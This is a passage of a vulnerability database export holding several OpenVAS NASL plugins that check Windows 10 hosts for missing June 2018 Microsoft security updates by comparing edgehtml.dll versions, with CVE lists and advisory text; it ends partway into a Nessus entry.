attacker\n to obtain information to further compromise the user's system, run processes in\n an elevated context, inject code into a trusted PowerShell process, execute\n arbitrary code, read privileged data, force the browser to send restricted data,\n interject cross-process communication, install programs, view, change, or delete\n data or create new accounts with full user rights and create a denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4284860\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.10240.0\", test_version2:\"11.0.10240.17888\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.10240.0 - 11.0.10240.17888\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T13:28:59", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8214", "CVE-2018-8225"], "description": "This host is missing a critical security\n update according to Microsoft KB4284880", "modified": "2019-12-20T00:00:00", "published": "2018-06-13T00:00:00", "id": "OPENVAS:1361412562310813528", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813528", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4284880)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4284880)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813528\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2018-0978\", \"CVE-2018-0982\", \"CVE-2018-1036\", \"CVE-2018-1040\",\n \"CVE-2018-8169\", \"CVE-2018-8201\", \"CVE-2018-8205\", \"CVE-2018-8207\",\n \"CVE-2018-8208\", \"CVE-2018-8209\", \"CVE-2018-8210\", \"CVE-2018-8211\",\n \"CVE-2018-8212\", \"CVE-2018-8213\", \"CVE-2018-8214\", \"CVE-2018-8215\",\n \"CVE-2018-8216\", \"CVE-2018-8217\", \"CVE-2018-8219\", \"CVE-2018-8221\",\n \"CVE-2018-8225\", \"CVE-2018-8226\", \"CVE-2018-8229\", \"CVE-2018-8231\",\n \"CVE-2018-8234\", \"CVE-2018-8235\", \"CVE-2018-8236\", \"CVE-2018-8239\",\n \"CVE-2018-8251\", \"CVE-2018-8267\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-13 09:07:28 +0530 (Wed, 13 Jun 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4284880)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4284880\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When the Windows kernel improperly handles objects in memory.\n\n - When Windows improperly handles objects in memory.\n\n - When the (Human Interface Device) HID Parser Library driver improperly handles\n objects in memory.\n\n - In Device Guard that could allow an attacker to inject malicious code into a\n Windows PowerShell session.\n\n - In Windows when Desktop Bridge does not properly manage the virtual registry.\n\n - When Windows allows a normal user to access the Wireless LAN profile of an\n administrative user.\n\n - In the way that the Windows Code Integrity Module performs hashing.\n\n - When Microsoft Edge improperly handles requests of different origins.\n\n - In the way that the Windows Kernel API enforces permissions.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When Microsoft Edge improperly accesses objects in memory.\n\n - When Windows Media Foundation improperly handles objects in memory.\n\n - When the Windows GDI component improperly discloses the contents of its\n memory.\n\n - When Windows Hyper-V instruction emulation fails to properly enforce privilege\n levels.\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When NTFS improperly checks access.\n\n - In the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - In the way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - In Windows Domain Name System (DNS) DNSAPI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, run processes in\n an elevated context, inject code into a trusted PowerShell process, execute\n arbitrary code, read privileged data, force the browser to send restricted data,\n interject cross-process communication, install programs, view, change, or delete\n data or create new accounts with full user rights and create a denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4284880\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.14393.0\", test_version2:\"11.0.14393.2311\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.14393.0 - 11.0.14393.2311\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8216", "CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8217", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-8225", "CVE-2018-0871"], "description": "This host is missing a critical security\n update according to Microsoft KB4284874", "modified": "2020-06-04T00:00:00", "published": "2018-06-13T00:00:00", "id": "OPENVAS:1361412562310813527", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813527", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4284874)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4284874)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813527\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0871\", \"CVE-2018-0978\", \"CVE-2018-0982\", \"CVE-2018-1036\",\n \"CVE-2018-1040\", \"CVE-2018-8113\", \"CVE-2018-8121\", \"CVE-2018-8169\",\n \"CVE-2018-8201\", \"CVE-2018-8205\", \"CVE-2018-8207\", \"CVE-2018-8208\",\n \"CVE-2018-8209\", \"CVE-2018-8210\", \"CVE-2018-8211\", \"CVE-2018-8212\",\n \"CVE-2018-8213\", \"CVE-2018-8214\", \"CVE-2018-8215\", \"CVE-2018-8216\",\n \"CVE-2018-8217\", \"CVE-2018-8219\", \"CVE-2018-8221\", \"CVE-2018-8225\",\n \"CVE-2018-8226\", \"CVE-2018-8227\", \"CVE-2018-8229\", \"CVE-2018-8231\",\n \"CVE-2018-8234\", \"CVE-2018-8235\", \"CVE-2018-8236\", \"CVE-2018-8239\",\n \"CVE-2018-8251\", \"CVE-2018-8267\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-13 09:06:23 +0530 (Wed, 13 Jun 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4284874)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4284874\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When the Windows kernel improperly handles objects in memory.\n\n - When Windows improperly handles objects in memory.\n\n - When the (Human Interface Device) HID Parser Library driver improperly handles\n objects in memory.\n\n - In Device Guard that could allow an attacker to inject malicious code into a\n Windows PowerShell session.\n\n - In Windows when Desktop Bridge does not properly manage the virtual registry.\n\n - When Windows allows a normal user to access the Wireless LAN profile of an\n administrative user.\n\n - When the Windows kernel improperly initializes objects in memory.\n\n - In the way that the Windows Code Integrity Module performs hashing.\n\n - When Microsoft Edge improperly handles requests of different origins.\n\n - In the way that the Windows Kernel API enforces permissions.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When Microsoft Edge improperly accesses objects in memory.\n\n - When Windows Media Foundation improperly handles objects in memory.\n\n - When the Windows GDI component improperly discloses the contents of its\n memory.\n\n - When Windows Hyper-V instruction emulation fails to properly enforce privilege\n levels.\n\n - In Internet Explorer that allows for bypassing Mark of the Web Tagging (MOTW).\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When NTFS improperly checks access.\n\n - When Edge improperly marks files.\n\n - In the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - In the way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - In Windows Domain Name System (DNS) DNSAPI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, run processes in\n an elevated context, inject code into a trusted PowerShell process, execute\n arbitrary code, read privileged data, force the browser to send restricted data,\n interject cross-process communication, install programs, view, change, or delete\n data or create new accounts with full user rights, create a denial of service\n condition and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1703 x32/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4284874\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.15063.0\", test_version2:\"11.0.15063.1154\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.15063.0 - 11.0.15063.1154\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-8233", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8226", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8110", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8140", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-1003", "CVE-2018-8225", "CVE-2018-0871", "CVE-2018-8175"], "description": "This host is missing a critical security\n update according to Microsoft KB4284835", "modified": "2020-06-04T00:00:00", "published": "2018-06-13T00:00:00", "id": "OPENVAS:1361412562310813530", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813530", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4284835)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4284835)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813530\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0871\", \"CVE-2018-0978\", \"CVE-2018-0982\", \"CVE-2018-1036\",\n \"CVE-2018-1040\", \"CVE-2018-8110\", \"CVE-2018-8113\", \"CVE-2018-8121\",\n \"CVE-2018-8140\", \"CVE-2018-8169\", \"CVE-2018-8175\", \"CVE-2018-8201\",\n \"CVE-2018-8205\", \"CVE-2018-8207\", \"CVE-2018-8208\", \"CVE-2018-8210\",\n \"CVE-2018-8211\", \"CVE-2018-8212\", \"CVE-2018-8213\", \"CVE-2018-8214\",\n \"CVE-2018-8215\", \"CVE-2018-8219\", \"CVE-2018-8221\", \"CVE-2018-8225\",\n \"CVE-2018-8226\", \"CVE-2018-8227\", \"CVE-2018-8229\", \"CVE-2018-8231\",\n \"CVE-2018-8233\", \"CVE-2018-8234\", \"CVE-2018-8235\", \"CVE-2018-8236\",\n \"CVE-2018-8239\", \"CVE-2018-8251\", \"CVE-2018-8267\", \"CVE-2018-1003\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-13 09:09:57 +0530 (Wed, 13 Jun 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4284835)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4284835\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When the Windows kernel improperly handles objects in memory.\n\n - When Windows improperly handles objects in memory.\n\n - When the (Human Interface Device) HID Parser Library driver improperly handles\n objects in memory.\n\n - In Device Guard that could allow an attacker to inject malicious code into a\n Windows PowerShell session.\n\n - In Windows when Desktop Bridge does not properly manage the virtual registry.\n\n - When Cortana retrieves data from user input services without consideration for\n status.\n\n - When the Windows kernel improperly initializes objects in memory.\n\n - In Windows when the Win32k component fails to properly handle objects in\n memory.\n\n - In the way that the Windows Code Integrity Module performs hashing.\n\n - When Microsoft Edge improperly handles requests of different origins.\n\n - In the way that the Windows Kernel API enforces permissions.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When Microsoft Edge improperly accesses objects in memory.\n\n - When Windows Media Foundation improperly handles objects in memory.\n\n - When the Windows GDI component improperly discloses the contents of its\n memory.\n\n - When Windows Hyper-V instruction emulation fails to properly enforce privilege\n levels.\n\n - When Windows NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n\n - In Internet Explorer that allows for bypassing Mark of the Web Tagging (MOTW).\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When NTFS improperly checks access.\n\n - When Edge improperly marks files.\n\n - In the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - In the way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - In Windows Domain Name System (DNS) DNSAPI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, run processes in\n an elevated context, inject code into a trusted PowerShell process, execute\n arbitrary code, read privileged data, force the browser to send restricted data,\n interject cross-process communication, install programs, view, change, or delete\n data or create new accounts with full user rights and create a denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1803 x32/x64-bit Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4284835\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.17134.0\", test_version2:\"11.0.17134.111\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.17134.0 - 11.0.17134.111\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:06:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8205", "CVE-2018-1036", "CVE-2018-0982", "CVE-2018-1040", "CVE-2018-8212", "CVE-2018-8211", "CVE-2018-8215", "CVE-2018-8229", "CVE-2018-8239", "CVE-2018-8219", "CVE-2018-8169", "CVE-2018-0978", "CVE-2018-8208", "CVE-2018-8226", "CVE-2018-8218", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8209", "CVE-2018-8221", "CVE-2018-8213", "CVE-2018-8234", "CVE-2018-8121", "CVE-2018-8113", "CVE-2018-8207", "CVE-2018-8210", "CVE-2018-8267", "CVE-2018-8251", "CVE-2018-8140", "CVE-2018-8111", "CVE-2018-8231", "CVE-2018-8201", "CVE-2018-8227", "CVE-2018-8214", "CVE-2018-8225", "CVE-2018-0871", "CVE-2018-8175"], "description": "This host is missing a critical security\n update according to Microsoft KB4284819", "modified": "2020-06-04T00:00:00", "published": "2018-06-13T00:00:00", "id": "OPENVAS:1361412562310813526", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813526", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4284819)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple Vulnerabilities (KB4284819)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813526\");\n script_version(\"2020-06-04T11:13:22+0000\");\n script_cve_id(\"CVE-2018-0871\", \"CVE-2018-0978\", \"CVE-2018-0982\", \"CVE-2018-1036\",\n \"CVE-2018-1040\", \"CVE-2018-8111\", \"CVE-2018-8113\", \"CVE-2018-8121\",\n \"CVE-2018-8140\", \"CVE-2018-8169\", \"CVE-2018-8175\", \"CVE-2018-8201\",\n \"CVE-2018-8205\", \"CVE-2018-8207\", \"CVE-2018-8208\", \"CVE-2018-8209\",\n \"CVE-2018-8210\", \"CVE-2018-8211\", \"CVE-2018-8212\", \"CVE-2018-8213\",\n \"CVE-2018-8214\", \"CVE-2018-8215\", \"CVE-2018-8218\", \"CVE-2018-8219\",\n \"CVE-2018-8221\", \"CVE-2018-8225\", \"CVE-2018-8226\", \"CVE-2018-8227\",\n \"CVE-2018-8229\", \"CVE-2018-8231\", \"CVE-2018-8234\", \"CVE-2018-8235\",\n \"CVE-2018-8236\", \"CVE-2018-8239\", \"CVE-2018-8251\", \"CVE-2018-8267\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 11:13:22 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-13 09:05:09 +0530 (Wed, 13 Jun 2018)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4284819)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4284819\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaw exists due to errors,\n\n - When the Windows kernel improperly handles objects in memory.\n\n - When Windows improperly handles objects in memory.\n\n - When the (Human Interface Device) HID Parser Library driver improperly handles\n objects in memory.\n\n - In Device Guard that could allow an attacker to inject malicious code into a\n Windows PowerShell session.\n\n - In Windows when Desktop Bridge does not properly manage the virtual registry.\n\n - When Windows allows a normal user to access the Wireless LAN profile of an\n administrative user.\n\n - When Cortana retrieves data from user input services without consideration for\n status.\n\n - When the Windows kernel improperly initializes objects in memory.\n\n - In the way that the Windows Code Integrity Module performs hashing.\n\n - When Microsoft Edge improperly handles requests of different origins.\n\n - In the way that the Windows Kernel API enforces permissions.\n\n - When Microsoft Edge improperly handles objects in memory.\n\n - When Microsoft Edge improperly accesses objects in memory.\n\n - When Windows Media Foundation improperly handles objects in memory.\n\n - When HTTP Protocol Stack (Http.\n\n - When the Windows GDI component improperly discloses the contents of its\n memory.\n\n - When Windows Hyper-V instruction emulation fails to properly enforce privilege\n levels.\n\n - When Windows NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n\n - When Microsoft Hyper-V Network Switch on a host server fails to properly\n validate input from a privileged user on a guest operating system.\n\n - In Internet Explorer that allows for bypassing Mark of the Web Tagging (MOTW).\n\n - When Internet Explorer improperly accesses objects in memory.\n\n - When NTFS improperly checks access.\n\n - When Edge improperly marks files.\n\n - In the way that the Chakra scripting engine handles objects in memory in\n Microsoft Edge.\n\n - In the way that the scripting engine handles objects in memory in Internet\n Explorer.\n\n - In Windows Domain Name System (DNS) DNSAPI.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to obtain information to further compromise the user's system, run processes in\n an elevated context, inject code into a trusted PowerShell process, execute\n arbitrary code, read privileged data, force the browser to send restricted data,\n interject cross-process communication, install programs, view, change, or delete\n data or create new accounts with full user rights and create a denial of service\n condition.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 10 Version 1709 for x32/x64-bit Systems.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4284819\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(version_in_range(version:edgeVer, test_version:\"11.0.16299.0\", test_version2:\"11.0.16299.491\"))\n{\n report = report_fixed_ver(file_checked:sysPath + \"\\Edgehtml.dll\",\n file_version:edgeVer, vulnerable_range:\"11.0.16299.0 - 11.0.16299.491\");\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-08-19T05:13:14", "description": "The remote Windows host is missing security update 4284860.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully 